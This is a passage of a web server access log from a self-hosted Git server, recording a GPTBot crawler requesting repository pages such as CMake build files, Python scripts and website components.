"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14310] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14310] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11040] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11041] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11041] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14310] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11041] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/mail_contact.py" +[17/Feb/2026:16:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9929] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:16:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9918] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" +[17/Feb/2026:16:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?state=closed" [Client 74.7.227.38] [Length 8483] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" +[17/Feb/2026:16:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10901] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:16:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10932] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" +[17/Feb/2026:16:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" +[17/Feb/2026:16:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" +[17/Feb/2026:16:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll?display=rendered" [Client 74.7.227.38] [Length 10836] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll" +[17/Feb/2026:16:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:16:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py?display=rendered" [Client 74.7.227.38] [Length 10900] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:16:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10922] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:47:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10893] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?state=open" [Client 74.7.227.38] [Length 8475] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?state=closed" +[17/Feb/2026:16:47:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9899] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:16:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 9918] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:16:47:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 15960] [Gzip 8.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:16:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 15994] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:16:47:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 2157] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:16:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 2157] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" +[17/Feb/2026:16:48:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:16:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec?display=source" [Client 74.7.227.38] [Length 12501] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:48:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec?display=source" [Client 74.7.227.38] [Length 12529] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:48:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py?display=rendered" [Client 74.7.227.38] [Length 10933] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:16:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py?display=source" [Client 74.7.227.38] [Length 16798] [Gzip 5.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/performance_comparison.py" +[17/Feb/2026:16:48:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:16:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec?display=source" [Client 74.7.227.38] [Length 12529] [Gzip 3.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldSpotMonitor_Final.spec" +[17/Feb/2026:16:48:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx?display=source" [Client 74.7.227.38] [Length 14252] [Gzip 4.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" +[17/Feb/2026:16:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx?display=rendered" [Client 74.7.227.38] [Length 10945] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" +[17/Feb/2026:16:48:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx?display=rendered" [Client 74.7.227.38] [Length 10942] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Hero.tsx" +[17/Feb/2026:16:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx?display=source" [Client 74.7.227.38] [Length 16516] [Gzip 5.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" +[17/Feb/2026:16:48:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx?display=source" [Client 74.7.227.38] [Length 15591] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" +[17/Feb/2026:16:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx?display=source" [Client 74.7.227.38] [Length 13974] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/About.tsx" +[17/Feb/2026:16:48:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx?display=source" [Client 74.7.227.38] [Length 14862] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" +[17/Feb/2026:16:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs?display=source" [Client 74.7.227.38] [Length 17935] [Gzip 5.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/Program.cs" +[17/Feb/2026:16:48:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 11122] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" +[17/Feb/2026:16:48:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 9924] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:16:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/include/site/python3.12/greenlet" +[17/Feb/2026:16:48:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcmake_install.cmake" [Client 74.7.227.38] [Length 27489] [Gzip 5.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcmake_install.cmake" [Client 74.7.227.38] [Length 25029] [Gzip 4.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cmake_install.cmake" +[17/Feb/2026:16:48:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fcmake.check_cache" [Client 74.7.227.38] [Length 24694] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:16:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fprogress.marks" [Client 74.7.227.38] [Length 22628] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:48:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr 